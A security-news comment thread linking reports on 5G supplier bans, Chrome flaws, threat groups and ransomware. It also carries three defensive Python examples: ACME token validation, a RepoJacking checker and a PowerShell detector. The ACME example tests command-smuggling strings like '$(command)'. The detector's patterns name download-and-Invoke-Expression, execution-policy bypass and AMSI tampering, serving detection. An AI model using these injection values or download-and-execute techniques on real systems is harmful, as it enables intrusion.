https://github.com/acmesh-official/acme.sh/issues/4659
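As an added example (not acme.sh’s code, and not a reconstruction of the bug tracked in the issue above), here is the hardening the takeaway asks for, applied to an http-01 challenge handler: the CA-supplied token is validated against the base64url alphabet that RFC 8555 requires before it is used in a file path or handed to a hook, and the hook is invoked as an argv list rather than a shell string, so nothing a CA sends is ever interpreted. The webroot layout and the key thumbprint value are constructed assumptions for this example.

```python
# Added example: treat the ACME CA as untrusted input. Validate the http-01
# token before it touches a path or a command. Webroot and thumbprint values
# below are constructed for this example.
import re
import subprocess
from pathlib import Path

# RFC 8555 section 8.3: a token MUST use only the base64url alphabet, without
# padding, and MUST carry at least 128 bits of entropy (22 base64url characters).
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{22,}")


def validate_token(token: str) -> bool:
    """True only for a token an honest CA could have issued."""
    return isinstance(token, str) and TOKEN_RE.fullmatch(token) is not None


def challenge_path(webroot: str, token: str) -> Path:
    """Path of /.well-known/acme-challenge/<token>, refusing anything that could escape webroot."""
    if not validate_token(token):
        raise ValueError(f"rejecting malformed challenge token: {token!r}")
    base = Path(webroot).resolve()
    target = (base / ".well-known" / "acme-challenge" / token).resolve()
    if base not in target.parents:   # defence in depth; the regex already forbids '/' and '.'
        raise ValueError("challenge path escaped webroot")
    return target


def write_challenge(webroot: str, token: str, thumbprint: str) -> Path:
    """Publish the key authorization (<token>.<thumbprint>) that the CA will fetch over HTTP."""
    path = challenge_path(webroot, token)
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(f"{token}.{thumbprint}")
    return path


def run_deploy_hook(hook: str, token: str) -> int:
    """Run a user-supplied hook with the token as a plain argument, never inside a shell string."""
    if not validate_token(token):
        raise ValueError("rejecting malformed challenge token")
    # argv list with shell=False: whatever the CA sent is only ever an argument value.
    return subprocess.run([hook, token], shell=False, check=False).returncode


if __name__ == "__main__":
    good = "Wi0rGPbKpQ9s1vnHsk8m9f3z7a1_-qXy"   # constructed, well-formed token
    for candidate in (good, "../../outside-webroot", "$(command)", "token; extra"):
        print(f"{candidate!r:28} valid={validate_token(candidate)}")
    print(challenge_path("/var/www/html", good))   # constructed webroot, not created here
```

The same rule applies to every other string in a CA response (URLs, identifiers, error text): parse it into a typed value and pass it as data, and a CA that is dishonest, or simply compromised, gets no way to run anything on the client.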
Tomi Engdahl says:
EU publishes new 5G report: ban on Huawei and ZTE network equipment
https://www.uusiteknologia.fi/2023/06/19/eulta-uusi-5g-raportti-kielto-huawein-ja-zten-verkkolaitteille/
The European Commission has published, for the second time, a report on the cybersecurity of 5G networks, supplemented by a new Commission communication stating that EU member states must refuse network equipment from the Chinese vendors Huawei and ZTE in their 5G networks.
Today the EU member states, with the support of the European Commission and the EU cybersecurity agency ENISA, published the second progress report on the implementation of the EU toolbox on 5G cybersecurity.
Regarding the strategic measures, and in particular the introduction of restrictions on high-risk suppliers, the progress report notes that 24 member states have adopted, or are currently preparing, legislative measures giving national authorities the power to assess suppliers and impose restrictions.
According to the report, ten EU member states have imposed restrictions and three member states are currently implementing the relevant national legislation. The Commission says member states should implement the toolbox without delay.
The Commission considers that the decisions taken by member states to restrict or exclude Huawei and ZTE from 5G networks are justified and consistent with the 5G toolbox. The Commission considers that Huawei and ZTE pose materially higher risks than other 5G suppliers.
Commission communication: Implementation of the 5G cybersecurity toolbox
https://digital-strategy.ec.europa.eu/fi/library/communication-commission-implementation-5g-cybersecurity-toolbox
Second report on Member States’ progress in implementing the EU Toolbox on 5G Cybersecurity
https://ec.europa.eu/newsroom/dae/redirection/document/96519
Tomi Engdahl says:
European Commission: Huawei and ZTE network equipment is a security risk
https://etn.fi/index.php/13-news/15105-euroopan-komissio-huawein-ja-zte-n-verkkolaitteet-ovat-turvallisuusriski
The EU Commission has published an updated report on its so-called 5G toolbox, which is used to assess the equipment suppliers used in the networks of member states’ operators. For Huawei and ZTE the Commission’s assessment is blunt: their equipment poses a considerably greater risk than equipment from other manufacturers.
The Commission’s statement says that member states’ decisions to restrict or entirely exclude Huawei and ZTE from participating in 5G network rollouts have been correct and consistent with the measures the countries previously agreed on for secure 5G deployment. Sweden, for example, acted correctly in barring Huawei and ZTE as equipment suppliers from the country’s 5G spectrum auction.
Tomi Engdahl says:
Users are defrauded of hundreds of millions every year: Meta is being called to account https://www.tivi.fi/uutiset/tv/51f43b68-d13b-47e1-9573-c92ad652f36c
In Britain, Meta is being asked to block online scams on its platforms more effectively.
The Guardian reports that on average one Briton is scammed on Facebook or Instagram every seven minutes. Every year Britons may be defrauded of as much as £250 million in total on these services, more than 290 million euros.
Tomi Engdahl says:
JPL Creates World’s Largest PDF Archive to Aid Malware Research https://www.jpl.nasa.gov/news/jpl-creates-worlds-largest-pdf-archive-to-aid-malware-research
“As part of DARPA’s SafeDocs program, JPL data scientists have amassed 8 million PDFs that can now be used for further study in order to make the internet more secure.”
Tomi Engdahl says:
Keep it, Tweak it, Trash it – What to do with Aging Tech in an Era of Consolidation
https://www.securityweek.com/keep-it-tweak-it-trash-it-what-to-do-with-aging-tech-in-an-era-of-consolidation/
Security vendor consolidation is picking up steam with good reason. Everyone wants to improve security efficiency and effectiveness while paying for less.
Consolidating security tools is a growing industry trend. In fact, a survey by Gartner found that 75% of organizations were pursuing security vendor consolidation in 2022, up from 29% in 2020.
IT is often viewed as a cost center and security is part of that. No one has unlimited budgets, and the pressure is on to justify costs and do more with less. The situation gets worse when earnings are down and there’s a looming specter of a slowdown in the economy.
Many security teams are being asked to start rethinking their approach to security if budgets get trimmed. It’s a natural part of the cycle of business and it’s rarely easy. But it can be a particularly onerous task within large, modern enterprises where Atomized Networks consist of up to three types of environments: IT, cloud, and operational technology (OT) environments. And, in many cases, each environment has a different team using different network traffic monitoring and security tools.
Some of these tools are “free” – whatever the cloud provider or service has available – and the perception is that there is no impact on budget. But the truth is, nothing is ever free. We’re making a tradeoff between paying for the tool and paying for people’s time to use, manage, and maintain a collection of different tool sets in different areas of the infrastructure. And that labor intensity is very costly.
Breaking Enterprise Silos and Improving Protection
https://www.securityweek.com/breaking-enterprise-silos-and-improving-protection/
When teams have a way to break down enterprise silos and see and understand what is happening, they can improve protection across their increasingly dispersed and diverse environment.
Tomi Engdahl says:
Watch on Demand: 2023 CISO Forum Sessions
All panel discussions and technical presentations from SecurityWeek’s 2023 CISO Forum are available to watch free on demand.
https://www.securityweek.com/watch-on-demand-2023-ciso-forum-sessions/
Tomi Engdahl says:
Finland is the most cyber-secure country in Europe
https://etn.fi/index.php/13-news/15109-suomi-on-euroopan-kyberturvallisin-maa
Indusface, which develops application security solutions, has ranked European countries by how safe they are for doing business. Finland topped the comparison together with Belgium, with the highest score of all.
Finland and Belgium recorded a cybersecurity index of 82.45 in the Indusface comparison, where the maximum is 100. Austria is third with 80.59. The least cyber-secure country in Europe is Bulgaria, with an index of 51.92.
Tomi Engdahl says:
https://etn.fi/index.php/tekniset-artikkelit/15107-salaus-ja-todennus-suojaa-vaeaerennoeksiltae
Tomi Engdahl says:
https://www.uusiteknologia.fi/2023/06/15/yritykset-varastoivat-turhaan-vanhoja-tietokoneitaan-tietoturvariski/
Tomi Engdahl says:
Security tips for holidaymakers: keep a special eye on company devices
https://www.uusiteknologia.fi/2023/06/20/tasta-tietoturvaohjeet-lomailijalle/
Cybersecurity experts at the consultancy Deloitte have listed their latest tips on what a holidaymaker should consider before, during and after a trip. Companies should also inform and instruct their employees about their security practices so that the security of both travellers and companies is maintained during the holiday season, especially since many of the devices are also used for company business.
Tomi Engdahl says:
CISO Conversations: Three Leading CISOs From the Payment Industry
https://www.securityweek.com/ciso-conversations-three-leading-cisos-from-the-payment-industry/
SecurityWeek talks to Chief Information Security Officers from Bill.com, FreedomPay, and Tassat about their role and experience as CISOs.
Tomi Engdahl says:
DOJ Launches Cyber Unit to Prosecute Nation-State Threat Actors
https://www.securityweek.com/doj-launches-cyber-unit-to-prosecute-nation-state-threat-actors/
New National Security Cyber Section will help the US disrupt and prosecute nation-state threat actors and state-sponsored cybercriminals.
The United States Department of Justice (DOJ) has created a new litigating section to increase its ability to disrupt and prosecute nation-state threat actors and state-sponsored cybercriminals.
Part of the National Security Division (NSD), the newly announced National Security Cyber Section – known as NatSec Cyber – will increase the Justice Department’s capacity to fight malicious cyberattacks threatening national security.
“This new section will allow NSD to increase the scale and speed of disruption campaigns and prosecutions of nation-state threat actors, state-sponsored cybercriminals, associated money launderers, and other cyber-enabled threats to national security,” NSD Assistant Attorney General Matthew G. Olsen said.
In tackling growing threats by nation-state attackers, the NatSec Cyber will also bolster intragovernmental collaboration between the Criminal Division’s Computer Crimes and Intellectual Property Section (CCIPS) and the FBI’s Cyber Division.
Tomi Engdahl says:
The government intends to crack down hard on Russian hybrid influence operations: a “Bäckman clause” is being planned for the Criminal Code
https://www.hs.fi/kotimaa/art-2000009669184.html?fbclid=IwAR18n_YNS527vwNByXbZcewZF_Od5HNFYOoaxa7z8vROwKSz5vUJ6-zzhQM
According to a professor of criminal law, new regulation is probably needed, but it must not restrict the freedom of speech defined in the constitution.
THE GOVERNMENT intends to criminalise influencing Finnish societal decision-making, and spreading false information about Finnish decision-making or social conditions, when this is done for the benefit of a foreign state and the activity is systematic.
The matter is recorded in the government programme under the subheading on the Finnish Security and Intelligence Service (Supo). Supo itself proposed a similar criminalisation last autumn, as Yle reported at the time.
According to Kimmo Nuotio, professor of criminal law at the University of Helsinki, the entry may be motivated by the activities of people like the Finnish docent Johan Bäckman. The possible future provision could even be called the “Bäckman clause”.
Tomi Engdahl says:
Cooperation or Competition? China’s Security Industry Sees the US, Not AI, as the Bigger Threat
https://www.securityweek.com/cooperation-or-competition-chinas-security-industry-sees-the-us-not-ai-as-the-bigger-threat/
China’s security and surveillance industry is focused on shoring up its vulnerabilities to the US and other outside actors, worried about risks posed by hackers, advances in AI and pressure from rival governments.
Tomi Engdahl says:
CISO Strategy
CISOs’ New Stressors Brought on by Digitalization: Report
https://www.securityweek.com/cisos-new-stressors-brought-on-by-digitalization-report/
Digitalization brings new security challenges, new concerns, and new threats, and CISOs should not think that it’s just business as usual.
Tomi Engdahl says:
Chrome and Its Vulnerabilities – Is the Web Browser Safe to Use?
https://www.securityweek.com/chrome-and-its-vulnerabilities-is-the-web-browser-safe-to-use/
Why are there so many vulnerabilities in Chrome? Is it realistically safe to use? Can Google do anything to make the web browser safer?
Like all major applications, Google’s Chrome suffers from vulnerabilities. During 2022, SecurityWeek reported on 456 vulnerabilities (averaging 38 per month), including nine zero-days. The high number of flaws needing to be patched poses a simple question: is Chrome safe to use?
This high rate of vulnerability disclosures and patches has continued into 2023. Chrome 109 patched 17 and six vulnerabilities in January. Chrome 110 patched 15 vulnerabilities in February; version 111 patched 40 and 8 in March; and version 112 patched 16 in April. April also saw a patch for the second zero-day vulnerability of 2023. Chrome 113 patched 15 vulnerabilities in May, followed by a further 12 vulnerabilities. June started with the third of 2023’s zero-day patches, in Chrome 114, and this was followed by a further 5 patches.
The list is so long it almost becomes boringly repetitive – but it will undoubtedly continue growing through the rest of the year and beyond. The questions raised, however, are not boring. Why are there so many vulnerabilities? Is Chrome realistically safe to use? Can Google do anything to make the product safer? Can users do anything to increase their safety? SecurityWeek talked to Tal Zamir, the CTO at Tel Aviv, Israel-based Perception Point (a detection and response vendor covering major threat surfaces including browsers).
The primary reason for the number of vulnerabilities is basically just statistics. It’s a combination of the size of the codebase, the attraction of the target, and the number of people who use it. “Over the years, Chrome has grown into a huge codebase – almost an operating system like Windows in its size, because it has so many features under the hood,” said Zamir.
The larger the codebase, the greater the number of vulnerabilities. That’s a reality of computing. The more an application is used, the greater the number of attackers looking for ways to attack it. This will include both criminals and nation states and is again inescapable. It’s worth noting that according to Statcounter (May 2023), Chrome had a 62.87% share of the global browser market. Safari was second with 20.7%, while Edge came in third with just 5.32%.
We cannot expect Google to do more to secure its code. This again is an inescapable feature of business life. Google would have to reduce both the quantity and speed with which it introduces new features, and that goes against the grain of ensuring and perhaps increasing market share. Microsoft has always been in catch-up mode for browsers, but now there is a full-fledged battle over the best (that is, most profitable) integration of AI into their products.
“Microsoft is giving Google a real fight,” said Zamir. “This is especially in the enterprise space but also for consumers who are tempted to go with the Microsoft bundles. I predict that it will become even harder for Google to fight and keep its first place in the browser space. In this fight, it will add new features and try to innovate even faster. When you do this, you typically put security as a secondary consideration. Speed is the need – you need to be in front of the users with shiny new things, and security might lag. It doesn’t mean that Google will neglect security. It definitely invests in the security of Chrome – but I think security will be secondary to the new features.”
Where Google cannot be criticized is over its reactive approach to Chrome security. The policy is to seek (by its own research teams and bug bounty program), and then remedy and patch vulnerabilities before they can be abused by attackers.
This is a reactive rather than proactive approach. While Google itself is largely forced by business realities to be reactive on security – and most companies are in the same position – the user can take a more proactive approach. This inevitably involves the addition of specialist security products, such as that from Perception Point, to protect the application and its use.
This raises one further question – if small security firms can protect Chrome, why cannot Google (one of the largest developers in the world) develop similar protection inside Chrome? “Google definitely could,” said Zamir, “if it was willing to invest many years of engineering.”
Technically, it is possible, but economically it is infeasible. We come back to the ‘shiny new thing’ image. For Chrome, the shiny new things are the additional features that make it attractive to users. Invisibly embedded complex security controls do not qualify as shiny new things, so will always be pushed down the priority line. But for a third party security vendor, security is the shiny thing.
Tomi Engdahl says:
David McCabe / New York Times:
Sources: the Biden administration has ramped up exploration of security concerns with Chinese cloud computing firms, potentially fueling tensions with Beijing — The Biden administration is exploring whether it can mount a campaign against Chinese tech giants like Alibaba and Huawei, potentially fueling tensions with Beijing.
https://www.nytimes.com/2023/06/21/technology/china-cloud-computing-concern.html
Tomi Engdahl says:
Threat Intelligence
The Benefits of Red Zone Threat Intelligence
https://www.securityweek.com/the-benefits-of-red-zone-threat-intelligence/
Incorporating Red Zone threat intelligence into your security strategy will help you stay on top of the latest threats and better protect your organization.
Tomi Engdahl says:
https://www.panoptica.app/solutions/cloud-native-application-security-solution?utm_campaign=fy23q4_panoptica_ww_paidmedia&utm_source=securityweek&utm_medium=cpm_awareness&utm_term=bubble-agilitymeetssecurity-learnmore-welcomead&utm_content=solutions-cloud-native-application-security-solution
Tomi Engdahl says:
TikTok’s Answer to Security Concerns? Grant Oracle Full Source Code Access
Oracle will also have access to TikTok’s algorithm and content-moderation material.
https://uk.pcmag.com/social-media/146987/tiktoks-answer-to-security-concerns-grant-oracle-full-source-code-access
Tomi Engdahl says:
https://www.kitploit.com/2023/06/scanner-and-patcher-web-vulnerability.html?fbclid=IwAR3roaDEJUcejXmUwLtz381nFuJ6EJlM-x0e8n4Z3q0RNFts06tVv_7gFu8&m=1
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/the-great-exodus-to-telegram-a-tour-of-the-new-cybercrime-underground/
Tomi Engdahl says:
Global CISO survey: digital-first economy introduces unforeseen risks for 89% of CISOs
June 21, 2023
Today’s digital-first economy has transformed the role of the modern CISO, increasing threats and changing security priorities.
https://www.securityinfowatch.com/security-executives/press-release/53064046/salt-security-global-ciso-survey-digitalfirst-economy-introduces-unforeseen-risks-for-89-of-cisos
Tomi Engdahl says:
Popular Android VPN sure looks like a DDoS botnet
By Matthew Zucca
An investigation into the Android app, Swing VPN, suggests potential misuse of users’ devices.
https://www.androidpolice.com/malware-android-vpn-ddos-botnet/
Tomi Engdahl says:
https://nakedsecurity.sophos.com/2023/06/21/beware-bad-passwords-as-attackers-co-opt-linux-servers-into-cybercrime/
Tomi Engdahl says:
German intelligence agency is using NFTs to attract cybersecurity talent
People who wish to mint an NFT in the collection have to participate in the treasure hunt and find a string of characters hidden by the BND.
https://cryptoslate.com/german-intelligence-agency-is-using-nfts-to-attract-cybersecurity-talent/
Tomi Engdahl says:
Docs Show FBI Pressures Cops to Keep Phone Surveillance Secrets
Newly released documents highlight the bureau’s continued secrecy around cell-site simulators—spying tech that everyone already assumes exists.
https://www.wired.com/story/fbi-cell-site-simulator-stingray-secrecy/?fbclid=IwAR0Ke4mvTxW74jlPlvOgVlDQkkWy-In0K_Cf2mEc4HZhd86ozzH4X5Bs1ek
Tomi Engdahl says:
Why Malware Crypting Services Deserve More Scrutiny https://krebsonsecurity.com/2023/06/why-malware-crypting-services-deserve-more-scrutiny/
This story explores the history and identity behind Cryptor[.]biz, a long-running crypting service that is trusted by some of the biggest names in cybercrime.
Tomi Engdahl says:
Ethical Problems in Computer Security
https://www.schneier.com/blog/archives/2023/06/ethical-problems-in-computer-security.html
Tadayoshi Kohno, Yasemin Acar, and Wulf Loh wrote excellent paper on ethical thinking within the computer security community: “Ethical Frameworks and Computer Security Trolley Problems: Foundations for Conversation“.
Tomi Engdahl says:
Paying Ransomware’s Ransom: Why it’s Time to Reconsider https://securityintelligence.com/articles/paying-ransomswares-ransom-why-its-time-to-reconsider/
When ransomware strikes, the biggest question a company has to answer is typically whether to pay the ransom. But paying the ransom is only a fraction of the total cost to a business. In some cases, companies may even face fines for paying up and not even getting their data back.
So why are companies still paying? Why are they not pulling in the experts, such as government support from the FBI or CISA, from the beginning?
Tomi Engdahl says:
Threat Group Assessment: Muddled Libra
https://unit42.paloaltonetworks.com/muddled-libra/
At the intersection of devious social engineering and nimble technology adaptation stands Muddled Libra. With an intimate knowledge of enterprise information technology, this threat group presents a significant risk even to organizations with well-developed legacy cyber defenses.
Muddled Libra is a methodical adversary that poses a substantial threat to organizations in the software automation, BPO, telecommunications and technology industries.
Tomi Engdahl says:
GitHub Dataset Research Reveals Millions Potentially Vulnerable to RepoJacking https://www.bleepingcomputer.com/news/security/millions-of-github-repos-likely-vulnerable-to-repojacking-researchers-say/
Username and repository name changes are frequent on GitHub, as organizations can get new management through acquisition or merger, or they can switch to a new brand name.
When this happens, a redirection is created to avoid breaking dependencies for projects using code from repositories that changed their name; however, if someone registers the old name, that redirection becomes invalid.
RepoJacking is an attack where a malicious actor registers a username and creates a repository used by an organization in the past but which has since changed its name.
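One way to find this exposure in your own dependency set is to ask GitHub what each pinned owner/repo resolves to today: a reference that now redirects to another owner is only a redirect, and if the old owner name answers 404 the name is free for anyone to register. The script below is an added example, not from the research the article describes: it pulls github.com references out of a manifest, follows the redirect with a HEAD request, and classifies the result. The manifest lines and the fake_fetch responses are constructed so that it runs offline; live_fetch does the same against the real site. A 404 on the old owner is a strong signal but not proof, because GitHub retires some namespaces of popular repositories from re-registration.

```python
import re
from urllib.error import HTTPError
from urllib.parse import urlparse
from urllib.request import Request, urlopen

# Matches github.com/<owner>/<repo> in go.mod, requirements.txt, package.json,
# git+https URLs, archive links, etc. The repo name stops at '.git', '/', '#',
# '?' or whitespace.
GITHUB_REF = re.compile(
    r"github\.com[/:]([\w.-]+)/([\w.-]+?)(?:\.git)?(?=[/#?\s]|$)"
)


def extract_repos(manifest_text):
    """Return unique (owner, repo) pairs in order of first appearance."""
    seen, repos = set(), []
    for owner, repo in GITHUB_REF.findall(manifest_text):
        key = (owner.lower(), repo.lower())
        if key not in seen:
            seen.add(key)
            repos.append((owner, repo))
    return repos


def live_fetch(url, timeout=10):
    """HEAD a URL, follow redirects, return (status, final_url)."""
    req = Request(url, method="HEAD", headers={"User-Agent": "repojack-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.geturl()
    except HTTPError as err:
        return err.code, url


def assess(owner, repo, fetch=live_fetch):
    """Classify one dependency reference.

    ok           - the name still resolves to itself
    missing      - the repository is gone (404)
    renamed      - it redirects elsewhere, but the old owner name is still held
    repojackable - it redirects elsewhere AND the old owner name answers 404,
                   so anyone can register it and shadow the redirect
    """
    ref = f"{owner}/{repo}"
    status, final_url = fetch(f"https://github.com/{owner}/{repo}")
    if status == 404:
        return {"ref": ref, "verdict": "missing", "resolves_to": None}
    parts = urlparse(final_url).path.strip("/").split("/")
    final_owner, final_repo = (parts + ["", ""])[:2]
    resolves_to = f"{final_owner}/{final_repo}"
    if (final_owner.lower(), final_repo.lower()) == (owner.lower(), repo.lower()):
        return {"ref": ref, "verdict": "ok", "resolves_to": resolves_to}
    owner_status, _ = fetch(f"https://github.com/{owner}")
    verdict = "repojackable" if owner_status == 404 else "renamed"
    return {"ref": ref, "verdict": verdict, "resolves_to": resolves_to}


# --- constructed offline data for the demonstration -------------------------
SAMPLE_MANIFEST = """
require github.com/oldorg/libfoo v1.2.3
"toolkit": "git+https://github.com/acme-corp/toolkit.git#v2"
https://github.com/sane-org/stable/archive/refs/tags/v1.0.tar.gz
"""

FAKE_WEB = {
    # renamed: the redirect lands on a new owner, and the old owner name is free
    "https://github.com/oldorg/libfoo": (200, "https://github.com/neworg/libfoo"),
    "https://github.com/oldorg": (404, "https://github.com/oldorg"),
    # renamed, but the old organisation still exists and holds its name
    "https://github.com/acme-corp/toolkit": (200, "https://github.com/acme-inc/toolkit"),
    "https://github.com/acme-corp": (200, "https://github.com/acme-corp"),
    # unchanged
    "https://github.com/sane-org/stable": (200, "https://github.com/sane-org/stable"),
}


def fake_fetch(url):
    return FAKE_WEB.get(url, (404, url))


def scan(manifest_text, fetch=live_fetch):
    return [assess(owner, repo, fetch) for owner, repo in extract_repos(manifest_text)]


if __name__ == "__main__":
    for result in scan(SAMPLE_MANIFEST, fake_fetch):
        print(f"{result['verdict']:13} {result['ref']} -> {result['resolves_to']}")
```

Run it with `scan(open("go.mod").read())` (the default live_fetch) to check a real manifest; anything reported as `renamed` is worth repinning to the new name even when it is not yet `repojackable`, because the redirect only protects you as long as nobody claims the old name.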
Tomi Engdahl says:
It is widely known that passwords are the leading cause of breaches, with 61% of breaches attributed to compromised credentials. Organizations are looking to enforce multi-factor authentication (MFA) to secure their users and data; but not all MFA solutions offer the same sort of protection, and some are susceptible to compromise by attackers.
Tomi Engdahl says:
NSA Releases Guide to Mitigate BlackLotus Threat https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3435305/nsa-releases-guide-to-mitigate-blacklotus-threat/
Malicious cyber actors could take advantage of a known vulnerability in the Microsoft Windows secure startup process to bypass Secure Boot protection and execute BlackLotus malware.
To guide system administrators and network defenders on how to mitigate this threat, the National Security Agency (NSA) is publicly releasing the “BlackLotus Mitigation Guide” Cybersecurity Information Sheet (CSI). The guide provides an overview of recommended actions to detect and prevent malicious activities associated with BlackLotus
Tomi Engdahl says:
Easy Configuration Fixes Can Protect Your Server from Attack https://securityintelligence.com/articles/easy-configuration-fixes-can-protect-your-server/
Poorly configured web servers are all too common. In fact, a recent study from a firm that indexes internet-facing devices reported that over 8,000 servers hosting sensitive information are not properly configured.
A recent Censys report stated that “data exposures via misconfiguration remain a serious problem. We found over 8,000 servers on the internet hosting potentially sensitive information, including possible credentials, database backups and configuration files.” As per the report, these vulnerabilities were easy to identify, as they would be for even inexperienced threat actors.
Tomi Engdahl says:
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.
The threat actors have the ability to gain complete control over the compromised devices, integrating those devices into the botnet. These devices are then used to execute additional attacks, including distributed denial-of-service (DDoS) attacks.
The widespread adoption of IoT devices has become a ubiquitous trend. However, the persistent security concerns surrounding these devices cannot be ignored.
The Mirai botnet, discovered back in 2016, is still active today. A significant part of the reason for its popularity among threat actors lies in the security flaws of IoT devices.
Tomi Engdahl says:
LockBit Green and phishing that targets organizations https://securelist.com/crimeware-report-lockbit-switchsymb/110068/
In recent months, we published private reports on a broad range of subjects.
We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these.
In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.
Tomi Engdahl says:
Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering https://thehackernews.com/2023/06/cybercrime-group-muddled-libra-targets.html
A threat actor known as Muddled Libra is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access.
Libra is the designation given by the cybersecurity company for cybercrime groups. The “muddled” moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework.
Tomi Engdahl says:
Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam https://thehackernews.com/2023/06/twitter-hacker-sentenced-to-5-years-in.html
A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S.
Joseph James O’Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021.
The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about $120,000 in illegal profits.
Tomi Engdahl says:
Checkmate: What Chess Taught Me About Cyber Resilience https://www.forbes.com/sites/forbestechcouncil/2023/06/23/checkmate-what-chess-taught-me-about-cyber-resilience/
In the game of chess, every single move contributes to the overall outcome.
All 16 pawns—the queen, knights, bishops and others—provide unique value to a player. The queen is the most powerful piece of the game and, if used strategically, can protect every other piece.
When investing in cybersecurity, CISOs must strategically place every resource in the right spot. Making the right moves at the right time will ensure the tools, people, practices and processes they invest in can protect their systems, networks and data from a cyberattack or data breach.
Making strategic moves is critical in building a successful and secure business.
A chess player must outsmart their opponent by predicting their next move and subsequently making a move to counteract their opponent. In cybersecurity, security teams must think ahead by putting themselves in the adversary’s shoes.
Tomi Engdahl says:
5 facts to know about the Royal ransomware gang https://www.malwarebytes.com/blog/business/2023/06/5-facts-to-know-about-the-royal-ransomware-gang
When we first introduced the Royal ransomware gang in our November 2022 review, little did we know they’d rapidly evolve into one of the most potent threats in our ongoing monthly threat intelligence briefings.
In fact, the Malwarebytes Threat Intelligence team has tracked down a staggering 195 ransomware incidents credited to Royal from November 2022 to June 2023.
Tomi Engdahl says:
https://www.iltalehti.fi/tietoturva/a/9d6634c7-cc5e-45ea-8a31-8091f06e0b0f
Malware spread by e-mail is most often hidden in PDF files sent as attachments. According to a report by the security firm Palo Alto Networks, this file format is used in 66.6 percent of the cases in which an attempt is made to infect the victim’s machine via e-mail.
https://start.paloaltonetworks.com/unit-42-network-threat-trends-report-malware-2023.html#register
Tomi Engdahl says:
Lisa O’Carroll / The Guardian:
The EFJ and media experts condemn the latest European Media Freedom Act draft that would let national security agencies place spyware on journalists’ phones
Draft EU plans to allow spying on journalists are dangerous, warn critics
https://www.theguardian.com/world/2023/jun/22/draft-eu-plans-to-allow-spying-on-journalists-are-dangerous-warn-critics
Move to allow spyware to be placed on reporters’ phones would have a ‘chilling effect’, say media experts
Tomi Engdahl says:
https://www.securityweek.com/nsa-issues-guidance-on-mitigating-blacklotus-bootkit-infections/
Tomi Engdahl says:
Bipartisan Bill Proposes Cybersecurity Funds for Rural Water Systems
https://www.securityweek.com/bipartisan-bill-proposes-cybersecurity-funds-for-rural-water-systems/
A new bill proposes to increase cybersecurity funding for rural water systems by $7.5 million dollars per year.
Tomi Engdahl says:
All About PowerShell Attacks: The No. 1 ATT&CK Technique https://securityintelligence.com/articles/all-about-powershell-attacks/
How do cyber pros prioritize their security efforts? A good place to start is knowing exactly what tactics, techniques and procedures (TTP) threat actors use. In a recently published report, aggregated data was used to identify the most common attack techniques as defined by the MITRE ATT&CK framework.
The study revealed that PowerShell Command & Scripting Interpreter was the number one attack technique used by threat actors. PowerShell is a command-line shell and scripting language that is widely used by system administrators and security professionals to automate tasks and manage systems. But threat actors can also use PowerShell to carry out malicious activities on compromised systems.
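The practical side of that ranking is that most PowerShell abuse leaves the same few fingerprints on a process-creation or script-block event: an -EncodedCommand blob, -nop / -w hidden / -ep bypass switches, and a download-and-Invoke-Expression chain inside the decoded payload. The script below is an added example, not from the report or the article: it decodes the UTF-16LE base64 that -EncodedCommand carries, runs a small set of indicator patterns over the raw and decoded text, and scores each event. The three command lines are constructed for the demonstration (203.0.113.5 is a documentation address); in practice you would feed it the CommandLine field of Windows event 4688 or Sysmon event 1.

```python
import base64
import binascii
import re

# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob
# (PowerShell accepts any unambiguous prefix of a parameter name).
ENC_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)

# Indicator patterns applied to the command line plus the decoded payload.
INDICATORS = [
    (r"(?i)\biex\b|invoke-expression", "Invoke-Expression"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient", "network download"),
    (r"(?i)frombase64string", "base64 payload"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-nop\b|-noprofile", "no profile"),
    (r"(?i)-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"(?i)amsiutils|amsiinitfailed", "AMSI tampering"),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none.
    PowerShell base64-encodes the script as UTF-16LE, not UTF-8."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze(cmdline):
    """Score one command line: each matched indicator adds one point."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [label for pattern, label in INDICATORS if re.search(pattern, text)]
    if decoded is not None:
        hits.insert(0, "encoded command")
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "score": len(hits)}


def triage(cmdlines):
    """Analyze every command line and return the results, most suspicious first."""
    return sorted((analyze(c) for c in cmdlines), key=lambda r: r["score"], reverse=True)


# --- constructed sample events ---------------------------------------------
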